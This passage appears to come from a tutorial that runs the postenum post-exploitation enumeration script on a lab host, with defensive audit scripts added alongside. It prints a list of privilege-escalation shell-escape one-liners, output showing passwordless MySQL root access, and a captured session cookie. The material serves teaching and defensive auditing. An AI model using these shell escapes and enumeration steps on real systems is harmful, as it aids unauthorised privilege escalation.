 92K -rwxr-xr-x 1 root root  88K Apr 11  2008 /sbin/init
 24K -rwxr-xr-x 1 root root  23K Nov 23  2007 /sbin/klogd
 16K -rwxr-xr-x 1 root root  15K Dec  3  2007 /sbin/portmap
 40K -rwxr-xr-x 1 root root  39K Dec  2  2008 /sbin/rpc.statd
 32K -rwxr-xr-x 1 root root  32K Nov 23  2007 /sbin/syslogd
 72K -rwxr-xr-x 1 root root  67K Apr 11  2008 /sbin/udevd
 32K -rwxr-xr-x 1 root root  31K May 21  2007 /usr/bin/jsvc
   0 lrwxrwxrwx 1 root root   29 Apr 28  2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20  2012 /usr/bin/unrealircd
 28K -rwxr-xr-x 1 root root  28K Apr 18  2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21  2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar  9  2010 /usr/sbin/apache2
 16K -rwxr-xr-x 1 root root  16K Feb 20  2007 /usr/sbin/atd
 32K -rwxr-xr-x 1 root root  31K Apr  8  2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28  2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr  9  2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28  2010 /usr/sbin/nmbd
 36K -rwxr-xr-x 1 root root  35K Dec  2  2008 /usr/sbin/rpc.idmapd
 76K -rwxr-xr-x 1 root root  72K Dec  2  2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28  2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K Apr  6  2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec  3  2007 /usr/sbin/xinetd

[x] Display every process running by root on the system:
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash

[x] Is mysql running by root:
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
www-data  4969  0.0  0.2   1784   540 pts/1    R+   13:44   0:00 grep mysql

It will try to locate any cron jobs in the common directories, as well as any belonging to root. It will also give us the contents of the crontab, which is the list of regularly scheduled commands used by administrators. Next, we can see the running services, including those running as root, and a check of whether a MySQL process is present and running as root.
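
A plain "grep mysql" over ps, which is what the check above amounts to, matches the root-owned mysqld_safe wrapper and the grep process itself, while the mysqld server (PID 4235) actually runs as the mysql user. The following script is an added example, not part of postenum: it resolves each daemon's effective user from ps output so an auditor can tell a root wrapper from a server that really runs as root. The ps lines are constructed from the listing above, and the UNPRIV_EXPECTED list of daemons that should drop privileges is a hypothetical baseline.

```shell
#!/bin/sh
# Added example, not part of postenum: resolve the effective user of each
# daemon from "ps aux"-style output. A plain "grep mysql" over ps matches the
# root-owned mysqld_safe wrapper and the grep itself, so it cannot tell a
# root wrapper from a server that really runs as root.

# Constructed from the process listing above (columns as printed by ps aux).
SAMPLE_PS='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --user=mysql
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
www-data  4969  0.0  0.2   1784   540 pts/1    R+   13:44   0:00 grep mysql'

# Hypothetical baseline: network daemons that are expected to drop privileges.
# apache2's master process legitimately stays root, so it is not listed.
UNPRIV_EXPECTED='mysqld unrealircd druby_timeserver.rb'

# daemon_user <ps-output>: print "<program> <user>" for every user-space
# process, skipping the header and kernel threads ([name]) and looking
# through interpreter wrappers such as "/bin/sh script" or "ruby script".
daemon_user() {
  printf '%s\n' "$1" | awk 'NR > 1 && $11 !~ /^\[/ {
    cmd = $11
    if (cmd ~ /(^|\/)(sh|bash|dash|ruby|perl|python)$/ && NF >= 12) cmd = $12
    n = split(cmd, parts, "/")
    print parts[n], $1
  }'
}

# root_daemons <ps-output>: names from UNPRIV_EXPECTED whose process is root.
root_daemons() {
  daemon_user "$1" | while read -r name user; do
    for expected in $UNPRIV_EXPECTED; do
      [ "$name" = "$expected" ] && [ "$user" = root ] && printf '%s\n' "$name"
    done
  done | sort -u
}

# Stand-alone run over the constructed sample (a live host would pipe
# "ps aux" in instead): prints druby_timeserver.rb and unrealircd.
root_daemons "$SAMPLE_PS"
```

On the sample, mysqld is reported under the mysql user and only the IRC daemon and the dRuby time server are flagged; mysqld_safe appears as a root wrapper but is not in the baseline, which is the distinction the grep-based check cannot make.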

Stage 4: Database Information

The next option we will cover will attempt to connect to MySQL and log in – use the -t switch to do so:

target:/var/tmp$ ./postenum.sh -t

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 25 min 31 sec

Threads: 2  Questions: 446  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.291

We can see that it was able to connect to the database as root without a password. It then gives us some version information, connection data, and the uptime.
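
Postenum establishes the finding with a single trial login as root. The following added example, not from postenum, turns it into a check over every account: it reads a tab-separated dump of user, host and password hash of the kind that `mysql -N -e "SELECT user, host, password FROM mysql.user"` produces on a 5.x server such as the 5.0.51a above (5.7 and later store the hash in authentication_string, so the column name in the query changes there). The sample rows are constructed; an empty hash column is what a passwordless account looks like in that dump.

```shell
#!/bin/sh
# Added example, not part of postenum: list MySQL accounts that can log in
# without a password, from a dump of the grant table rather than from one
# trial login. Input format (tab-separated, one account per line):
#   mysql -N -e "SELECT user, host, password FROM mysql.user"
# on a 5.x server such as the 5.0.51a above; on 5.7+ the hash column is
# authentication_string. The rows below are constructed, not dumped.
SAMPLE_USERS=$(printf 'root\tlocalhost\t\nroot\t%%\t\ndebian-sys-maint\tlocalhost\t*7F4C1B1DFD0A2F3E\n\tlocalhost\t\nwww\t10.10.0.%%\t\n')

# passwordless_accounts <dump>: print user@host for every row whose hash
# column is empty; the anonymous account ('' user) is shown as (anonymous).
passwordless_accounts() {
  printf '%s\n' "$1" | awk -F '\t' '{
    user = ($1 == "") ? "(anonymous)" : $1
    if ($3 == "") printf "%s@%s\n", user, $2
  }'
}

# remote_passwordless <dump>: the subset whose host pattern is not local,
# i.e. accounts reachable over the network when the server is not bound to
# localhost (the target above listens on port 3306).
remote_passwordless() {
  passwordless_accounts "$1" | grep -v -e '@localhost$' -e '@127\.0\.0\.1$' -e '@::1$' || true
}

# Remediation on a 5.x server (comments only; standard MySQL statements):
#   SET PASSWORD FOR 'root'@'localhost' = PASSWORD('<new strong password>');
#   DROP USER 'root'@'%';  DROP USER ''@'localhost';
#   and bind-address = 127.0.0.1 in my.cnf when no remote client needs it.

passwordless_accounts "$SAMPLE_USERS"
```

Run against a real dump, the remote subset is the one to fix first, since those accounts are usable without a foothold on the host at all.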

Stage 5: Development Tools & Shell Escapes

The next option we will cover searches for common development tools on the system, which can often be abused and lead to privilege escalation. It will also try some common shell escapes in case a restricted shell is in place. Use the -l option for this:

target:/var/tmp$ ./postenum.sh -l

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] DEVELOPMENT TOOLS and LANGUAGES
[+] - Check for development tools and languages are installed/supported
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/gcc
/usr/bin/cc
/usr/bin/nmap

[+] - Check for how files can be uploaded
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl

[+] - Shell escape
awk    =        awk 'BEGIN {system("/bin/sh")}'
perl   =        perl -e 'exec "/bin/sh";'
python =        python -c 'import pty;pty.spawn("/bin/sh")'
php    =        php -r 'system("/bin/sh");'
ruby   =        ruby -e 'exec "/bin/sh"'
less   =        !sh
more   =        !sh
man    =        !sh
nmap   =        --interactive
nmap   =        echo "os.execute('/bin/sh')" > /tmp/shell.nse
find   =        find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
find   =        find / -exec sh -i \;
vi     =        :!sh or :shell or -c '!sh'
vim    =        :!sh or :shell or -c '!sh'
gdb      =      shell

[+] - List all Environment Variables
SERVER_SIGNATURE=<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>

ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
TERM=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/vulnerabilities/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=webmaster@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/vulnerabilities/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=Apache/2.2.8 (Ubuntu) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=security=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=POST
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

We can see that it found several dev tools and languages, such as Python, PHP, and Nmap, among others. It also checks for tools that can be used to upload files, which could lead to further compromise. It then lists some shell escape commands, followed by the environment variables and the shells available on the system.
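
The environment listing is worth a second look from the defender's side: the shell carries GATEWAY_INTERFACE, REMOTE_ADDR, REQUEST_METHOD and the HTTP_COOKIE session because it was spawned by the web server's PHP CGI, and that request-scoped environment survives into every child. The following added example, not part of postenum, uses that as a host-side signal that an interactive shell was started from a web request. The two environ files are constructed in the NUL-separated layout of /proc/<pid>/environ; the scan_procs function, which walks the real /proc on a Linux host, is a hypothetical deployment of the same check.

```shell
#!/bin/sh
# Added example, not part of postenum: a shell started through web command
# injection inherits the CGI request environment, which is why the printenv
# listing above carries GATEWAY_INTERFACE, REMOTE_ADDR and the HTTP_COOKIE
# session. A defender can use the same fact as a host-side signal: an
# interactive shell has no business holding request variables.

# Two constructed /proc/<pid>/environ-style files (NUL-separated KEY=VALUE):
# one for a shell spawned by the web server, one for a normal login shell.
WEB_ENV=$(mktemp)
LOGIN_ENV=$(mktemp)
trap 'rm -f "$WEB_ENV" "$LOGIN_ENV"' EXIT
printf 'GATEWAY_INTERFACE=CGI/1.1\0REQUEST_METHOD=POST\0REMOTE_ADDR=10.10.0.1\0HTTP_COOKIE=security=low; PHPSESSID=<constructed>\0TERM=xterm\0PWD=/var/tmp\0' > "$WEB_ENV"
printf 'TERM=xterm\0HOME=/home/user\0SHELL=/bin/bash\0PATH=/usr/bin:/bin\0' > "$LOGIN_ENV"

# cgi_markers <environ-file>: print the names of request-scoped variables
# found in the environment block.
cgi_markers() {
  tr '\0' '\n' < "$1" | awk -F '=' '$1 ~ /^(GATEWAY_INTERFACE|REQUEST_METHOD|REQUEST_URI|REMOTE_ADDR|SCRIPT_FILENAME|QUERY_STRING|HTTP_[A-Z_]+)$/ { print $1 }'
}

# web_spawned_shell <environ-file>: succeed when any marker is present.
web_spawned_shell() {
  cgi_markers "$1" | grep -q .
}

# scan_procs: on a live Linux host, report shell processes whose environment
# carries CGI markers (hypothetical deployment of the check above). Only
# processes readable by the caller are inspected; run it as root, or from a
# privileged agent, to cover every user including www-data.
scan_procs() {
  for p in /proc/[0-9]*; do
    comm=$(cat "$p/comm" 2>/dev/null) || continue
    case "$comm" in sh|bash|dash) ;; *) continue ;; esac
    if web_spawned_shell "$p/environ" 2>/dev/null; then
      printf 'pid %s (%s): %s\n' "${p#/proc/}" "$comm" \
        "$(cgi_markers "$p/environ" | tr '\n' ' ')"
    fi
  done
}

# Stand-alone demonstration on the constructed files.
printf 'web shell markers: %s\n' "$(cgi_markers "$WEB_ENV" | tr '\n' ' ')"
web_spawned_shell "$LOGIN_ENV" || echo 'login shell: clean'
```

A legitimate CGI handler holds the same variables, so the signal is the combination of a shell program name with a CGI environment, not either alone; the PHPSESSID in HTTP_COOKIE also shows why a compromised host's process environments should be treated as containing live credentials.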

Stage 6: Software Versions

The next option we will look at will determine some version information for common software installed on the target. Use the -v switch to do so:

target:/var/tmp$ ./postenum.sh -v

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] SOFTWARES VERSION
[+] - Check apps and services version
[x] Sudo version (<= 1.8.20):
Sudo version 1.6.9p10

[x] MYSQL version:
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

[x] PostgreSQL version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

[x] Java version:
java version "1.5.0"
gij (GNU libgcj) version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)

Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

This gives us the software version numbers for Sudo, MySQL, PostgreSQL, and Java.
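
Postenum prints "(<= 1.8.20)" beside the sudo banner but leaves the comparison to the reader, and the mysql banner shows why that is error-prone: the first number (14.12) is the client's own version, and the server version follows "Distrib". The helpers below are an added example, not postenum code: they parse a banner and compare the parsed version against a threshold, so the same logic can gate a finding in an audit script. They assume GNU sort, whose -V ordering places 1.6.9p10 before 1.8.20 and 1.8.20 before 1.8.20p1; the sudo threshold is postenum's own, while the MySQL and PostgreSQL thresholds used in the stand-alone run are placeholders to show the mechanism.

```shell
#!/bin/sh
# Added example, not part of postenum: postenum prints "(<= 1.8.20)" beside
# the sudo banner but leaves the comparison to the reader. These helpers
# parse a banner and compare the parsed version against a threshold, so
# the same logic can gate a finding for sudo, MySQL or PostgreSQL alike.
# Assumes GNU sort (sort -V), which orders 1.6.9p10 < 1.8.20 < 1.8.20p1.

# version_le A B: succeed when version A is less than or equal to version B.
version_le() {
  [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# banner_version <banner> [marker]: first dotted version number in the
# banner, optionally taken from the text after <marker> (the mysql client
# prints its own version before the server "Distrib" version).
banner_version() {
  text=$1
  if [ -n "${2:-}" ]; then text=${text#*"$2"}; fi
  printf '%s\n' "$text" | grep -o -E '[0-9]+(\.[0-9]+)+[a-z0-9]*' | head -n 1
}

# check_banner <name> <banner> <max-affected> [marker]: print a verdict;
# return 0 when the installed version is at or below the threshold,
# 1 when it is newer, 2 when no version could be parsed.
check_banner() {
  v=$(banner_version "$2" "${4:-}")
  if [ -z "$v" ]; then
    printf '%s: no version found in banner\n' "$1"; return 2
  elif version_le "$v" "$3"; then
    printf '%s %s: at or below %s\n' "$1" "$v" "$3"; return 0
  else
    printf '%s %s: newer than %s\n' "$1" "$v" "$3"; return 1
  fi
}

# Banners as printed by the -v run above. The sudo bound is postenum's own;
# the MySQL and PostgreSQL bounds are placeholder values for demonstration.
check_banner sudo 'Sudo version 1.6.9p10' 1.8.20 || true
check_banner mysql 'mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486)' 5.0.51a Distrib || true
check_banner postgresql 'psql (PostgreSQL) 8.3.1' 8.3.0 || true
```

The banners come from the client binaries on the host, which is what postenum can reach; on a fleet, the same check_banner calls can be fed from package-manager output instead, which is the authoritative source for what is installed.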

Stage 7: Interesting Files

The next option will try to locate any interesting files present on the system that could potentially be used for privilege escalation. Use the -c switch for this:

target:/var/tmp$ ./postenum.sh -c

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] CONFIDENTIAL INFO and USER
[+] - Check list of users and super users
[x] Super user:
root:x:0:0:root:/root:/bin/bash
root

[x] Useful home users:
drwxr-xr-x 2 root     nogroup  4096 Mar 17  2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 Jun 16  2018 /home/msfadmin
drwxr-xr-x 2 service  service  4096 Apr 16  2010 /home/service
drwxr-xr-x 3 user     user     4096 May  7  2010 /home/user

[x] Anything with /bin/bash /bin/sh /bin/dash:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash

[+] - Check /etc for config files (recursive 1 level)
[x] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr  9  2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov  6  2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26  2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13  2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr  4  2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20  2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16  2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11  2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20  2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16  2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20  2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16  2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 17  2006 /etc/logrotate.conf
